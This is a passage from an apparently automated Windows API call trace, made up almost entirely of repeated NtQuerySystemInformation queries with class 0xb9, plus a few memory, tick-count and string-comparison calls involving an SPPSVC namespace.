ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x40, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x40, ResultLength=0x0) [0234.237] LocalAlloc (uFlags=0x0, uBytes=0x82) returned 0x269495f2f80 [0234.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x40, ResultLength=0x0) [0234.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x40, ResultLength=0x0) [0234.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x40, ResultLength=0x0) [0234.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x58, ResultLength=0x0) [0234.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbe0, Length=0x28, ResultLength=0x0) [0234.280] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0234.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x58, ResultLength=0x0) [0234.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x58, ResultLength=0x0) [0234.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x58, ResultLength=0x0) [0234.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb50, Length=0x38, ResultLength=0x0) [0234.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd990, Length=0x28, ResultLength=0x0) [0234.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd990, Length=0x28, ResultLength=0x0) [0234.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd990, Length=0x28, ResultLength=0x0) [0234.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x28, ResultLength=0x0) [0234.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb50, Length=0x38, ResultLength=0x0) [0234.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb50, Length=0x38, ResultLength=0x0) [0234.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda80, Length=0x28, ResultLength=0x0) [0234.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda80, Length=0x28, ResultLength=0x0) [0234.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb50, Length=0x38, ResultLength=0x0) [0234.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb50, Length=0x38, ResultLength=0x0) [0234.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8f0, Length=0x20, ResultLength=0x0) [0234.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd870, Length=0x20, ResultLength=0x0) [0234.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd870, Length=0x20, ResultLength=0x0) [0234.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd870, Length=0x20, ResultLength=0x0) [0234.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdac0, Length=0x20, ResultLength=0x0) [0234.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb50, Length=0x38, ResultLength=0x0) [0234.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9e0, Length=0x20, ResultLength=0x0) [0234.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0234.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0234.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0234.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb50, Length=0x38, ResultLength=0x0) [0234.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9e0, Length=0x20, ResultLength=0x0) [0234.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0234.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0234.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0234.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb50, Length=0x38, ResultLength=0x0) [0234.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9e0, Length=0x20, ResultLength=0x0) [0234.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd970, Length=0x20, ResultLength=0x0) [0234.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd970, Length=0x20, ResultLength=0x0) [0234.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x58, ResultLength=0x0) [0234.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x20, ResultLength=0x0) [0234.303] GetTickCount () returned 0x117aec1 [0234.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda68, Length=0x58, ResultLength=0x0) [0234.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd980, Length=0x38, ResultLength=0x0) [0234.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7b0, Length=0x28, ResultLength=0x0) [0234.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7b0, Length=0x28, ResultLength=0x0) [0234.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7b0, Length=0x28, ResultLength=0x0) [0234.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7b0, Length=0x28, ResultLength=0x0) [0234.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd820, Length=0x28, ResultLength=0x0) [0234.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd980, Length=0x38, ResultLength=0x0) [0234.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8a0, Length=0x28, ResultLength=0x0) [0234.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8a0, Length=0x28, ResultLength=0x0) [0234.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd980, Length=0x38, ResultLength=0x0) [0234.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x20, ResultLength=0x0) [0234.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd780, Length=0x20, ResultLength=0x0) [0234.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd780, Length=0x20, ResultLength=0x0) [0234.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd780, Length=0x20, ResultLength=0x0) [0234.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd980, Length=0x38, ResultLength=0x0) [0234.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x20, ResultLength=0x0) [0234.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd790, Length=0x20, ResultLength=0x0) [0234.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd790, Length=0x20, ResultLength=0x0) [0234.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda68, Length=0x58, ResultLength=0x0) [0234.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd940, Length=0x38, ResultLength=0x0) [0234.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd780, Length=0x28, ResultLength=0x0) [0234.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd780, Length=0x28, ResultLength=0x0) [0234.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd780, Length=0x28, ResultLength=0x0) [0234.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd780, Length=0x28, ResultLength=0x0) [0234.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x28, ResultLength=0x0) [0234.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd940, Length=0x38, ResultLength=0x0) [0234.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd940, Length=0x38, ResultLength=0x0) [0234.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd870, Length=0x28, ResultLength=0x0) [0234.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd870, Length=0x28, ResultLength=0x0) [0234.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd940, Length=0x38, ResultLength=0x0) [0234.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd940, Length=0x38, ResultLength=0x0) [0234.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6e0, Length=0x20, ResultLength=0x0) [0234.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8b0, Length=0x20, ResultLength=0x0) [0234.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd940, Length=0x38, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7d0, Length=0x20, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd750, Length=0x20, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd750, Length=0x20, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd750, Length=0x20, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd940, Length=0x38, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7d0, Length=0x20, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd750, Length=0x20, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd750, Length=0x20, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd750, Length=0x20, ResultLength=0x0) [0234.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.327] NtQuerySystemInformation 